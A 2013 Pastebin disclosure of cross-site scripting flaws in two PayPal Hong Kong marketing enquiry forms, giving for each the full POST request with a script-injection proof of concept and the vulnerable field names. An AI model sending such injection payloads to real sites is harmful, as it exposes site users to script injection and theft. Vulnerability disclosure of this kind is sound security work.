SHARE
TWEET

Paypal xss vulnerability

BreakTheSec Feb 16th, 2013 1,034 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Number of Vulnerabilities : 2
  2. ___________________________________________________________________________________________    
  3. --- Vulnerability # No-  1:
  4. ___________________________________________________________________________________________
  5. +URL:  https://www.paypal-marketing.com.hk/merchant-enquiries/index.php
  6. +Vulnerability Type:  Cross Site Scripting (XSS)
  7. + Form Action : POST
  8. +POST Data Sent to Produce the Bug :
  9.  
  10. token=1359557986&from_page=en&company_name=%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&business_type_other=vulnerable_field&business_need_other=vulnerable_field&contact_person=vulnerable_field&contact_person2=vulnerable_field&phone=vulnerable_field&phone2=vulnerable_field&email=vulnerable_field&email2=vulnerable_field&business_type=1
  11.  
  12. --Here, the field name with field value vulnerable_field are all vulnerable to cross site scripting .
  13.  
  14. And, the filed name (company_name)  with value %22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E is also vulnerable and used here to produce the XSS bug here .
  15. +POST Parameters that cause XSS Vulnerability in this Page :
  16. company_name , business_type_other,business_need_other, contact_person ,contact_person2, phone,phone2, email,email2
  17.  
  18. +How to fix :
  19. -- Though this page uses a java script function to validate this form, but it fails to sanitize the all characters which could allow hackers or pen testers to  return malicious on webpage like Cross Site Scripting attack   
  20.  
  21. ___________________________________________________________________________________________
  22. Vulnerability No. #  2 :
  23. ___________________________________________________________________________________________
  24. +URL:  https://www.paypal-marketing.com.hk/merchant-enquiries/index-zh.php
  25. +Vulnerability Type:  Cross Site Scripting (XSS)
  26. + Form Action : POST
  27. +POST Data Sent to Produce the Bug :
  28.  
  29. token=1359557986&from_page=en&company_name=%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&business_type_other=vulnerable_field&business_need_other=vulnerable_field&contact_person=vulnerable_field&contact_person2=vulnerable_field&phone=vulnerable_field&phone2=vulnerable_field&email=vulnerable_field&email2=vulnerable_field&business_type=1
  30.  
  31. --Here, the field name with field value vulnerable_field are all vulnerable to cross site scripting .
  32.  
  33. And, the filed name (company_name)  with value %22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E is also vulnerable and used here to produce the XSS bug here .
  34. +POST Parameters that cause XSS Vulnerability in this Page :
  35. company_name , business_type_other,business_need_other, contact_person ,contact_person2, phone,phone2, email,email2
  36.  
  37. +How to fix :
  38. -- Though this page uses a java script function to validate this form, but it fails to sanitize the all characters which could allow hackers or pen testers to  return malicious on webpage like Cross Site Scripting attack
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top